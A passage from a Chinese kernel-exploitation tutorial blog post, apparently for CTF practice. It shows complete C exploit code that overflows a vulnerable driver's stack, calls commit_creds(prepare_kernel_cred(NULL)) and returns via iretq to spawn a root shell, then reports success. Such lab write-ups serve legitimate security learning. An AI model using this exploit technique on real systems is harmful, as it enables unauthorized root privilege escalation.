class="hljs-keyword">define</span> PREPARE_KERNEL_CRED_ADDR 0xffffffff810969b0</span><br><br><span class="hljs-comment">// 预留变量，用于保存 Ring 3 的状态</span><br><span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> user_cs, user_ss, user_rflags, user_sp;<br><br><span class="hljs-comment">// 1. 保存用户态现场（为后面完美执行 iretq 做准备）</span><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">save_state</span><span class="hljs-params">()</span> </span>&#123;<br>    __asm__ __volatile__(<br>        <span class="hljs-string">&quot;movq %%cs, %0\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%ss, %1\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rsp, %2\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushfq\n\t&quot;</span><br>        <span class="hljs-string">&quot;popq %3\n\t&quot;</span><br>        : <span class="hljs-string">&quot;=r&quot;</span>(user_cs), <span class="hljs-string">&quot;=r&quot;</span>(user_ss), <span class="hljs-string">&quot;=r&quot;</span>(user_sp), <span class="hljs-string">&quot;=r&quot;</span>(user_rflags)<br>        :<br>        : <span class="hljs-string">&quot;memory&quot;</span><br>    );<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] User state saved.&quot;</span>);<br>&#125;<br><br><span class="hljs-comment">// 4. 拿到 Root 后要弹出的 Shell</span><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">get_shell</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Returning to userland...&quot;</span>);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">getuid</span>() == <span class="hljs-number">0</span>) &#123;<br>        <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Privilege escalation SUCCESS! Got Root!&quot;</span>);<br>        <span class="hljs-built_in">execl</span>(<span class="hljs-string">&quot;/bin/sh&quot;</span>, <span class="hljs-string">&quot;sh&quot;</span>, <span class="hljs-literal">NULL</span>);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[-] Failed to get root.&quot;</span>);<br>    &#125;<br>    <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>&#125;<br><br><span class="hljs-comment">// 2. 将在 Ring 0 执行的提权代码</span><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">payload</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-comment">// 定义函数指针</span><br>    <span class="hljs-type">void</span>* (*prepare_kernel_cred)(<span class="hljs-type">void</span>*) = (<span class="hljs-type">void</span>*)PREPARE_KERNEL_CRED_ADDR;<br>    <span class="hljs-built_in">int</span> (*commit_creds)(<span class="hljs-type">void</span>*) = (<span class="hljs-type">void</span>*)COMMIT_CREDS_ADDR;<br><br>    <span class="hljs-comment">// 提权：执行 commit_creds(prepare_kernel_cred(NULL))</span><br>    <span class="hljs-built_in">commit_creds</span>(<span class="hljs-built_in">prepare_kernel_cred</span>(<span class="hljs-literal">NULL</span>));<br><br>    <span class="hljs-comment">// 3. 核心步骤：手动构建中断返回栈，模拟内核返回 Ring 3！</span><br>    __asm__ __volatile__(<br>        <span class="hljs-string">&quot;swapgs\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushq %0\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushq %1\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushq %2\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushq %3\n\t&quot;</span><br>        <span class="hljs-string">&quot;pushq %4\n\t&quot;</span><br>        <span class="hljs-string">&quot;iretq\n\t&quot;</span><br>        :<br>        : <span class="hljs-string">&quot;m&quot;</span>(user_ss), <span class="hljs-string">&quot;m&quot;</span>(user_sp), <span class="hljs-string">&quot;m&quot;</span>(user_rflags), <span class="hljs-string">&quot;m&quot;</span>(user_cs), <span class="hljs-string">&quot;r&quot;</span>(&amp;get_shell)<br>        : <span class="hljs-string">&quot;memory&quot;</span><br>    );<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-built_in">save_state</span>(); <span class="hljs-comment">// 跑路前先记好家门钥匙</span><br><br>    <span class="hljs-type">int</span> fd = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;/dev/vuln_device&quot;</span>, O_RDWR);<br>    <span class="hljs-keyword">if</span> (fd &lt; <span class="hljs-number">0</span>) &#123;<br>        <span class="hljs-built_in">perror</span>(<span class="hljs-string">&quot;[-] Failed to open device&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 构造溢出数据</span><br>    <span class="hljs-comment">// 缓冲区 64 字节 + RBP 8 字节 = 72 字节的垃圾数据</span><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> buf[<span class="hljs-number">16</span>]; <span class="hljs-comment">// 16 * 8 = 128 bytes</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">9</span>; i++) &#123;<br>        buf[i] = <span class="hljs-number">0x4141414141414141</span>; <span class="hljs-comment">// 填充 &#x27;A&#x27;</span><br>    &#125;<br>    <br>    buf[<span class="hljs-number">8</span>] = (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>)&amp;payload; <br><br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Firing payload...&quot;</span>);<br>    <br>    <span class="hljs-built_in">write</span>(fd, buf, <span class="hljs-number">80</span>); <br><br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; <span class="hljs-comment">// 理论上永远执行不到这里</span><br>&#125;<br></code></pre></td></tr></table></figure>





<img src="/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514175018734.png" srcset="/img/loading.gif" lazyload class="" title="image-20260514175018734">

<p>成功提权。</p>
<h2 id="内核态函数（收集整理）"><a href="#内核态函数（收集整理）" class="headerlink" title="内核态函数（收集整理）"></a>内核态函数（收集整理）</h2><p>内核态无法使用用户态的函数，其内核有着自己定义的函数。</p>
<h2 id="参考连接"><a href="#参考连接" class="headerlink" title="参考连接"></a>参考连接</h2><p><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-276403-1.htm">https://bbs.kanxue.com/thread-276403-1.htm</a></p>
<p><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/">https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/pwn/" class="category-chain-item">pwn</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn/kernel/" class="category-chain-item">kernel</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>kernel入门</div>
      <div>https://yy-t1.github.io/2026/05/13/kernel入门/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>bsahfm</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年5月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/05/14/pwn/kernel/kernel%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/" title="kernel保护机制">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">kernel保护机制</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/05/13/pwn/kernel/kernel%E5%85%A5%E9%97%A8/" title="kernel入门">
                        <span class="hidden-mobile">kernel入门</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"A72cL0RlIkmsXlCGMx51Qi51-gzGzoHsz","appKey":"xxsSPn2ge0tYPU7nwv5Gyd1r","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
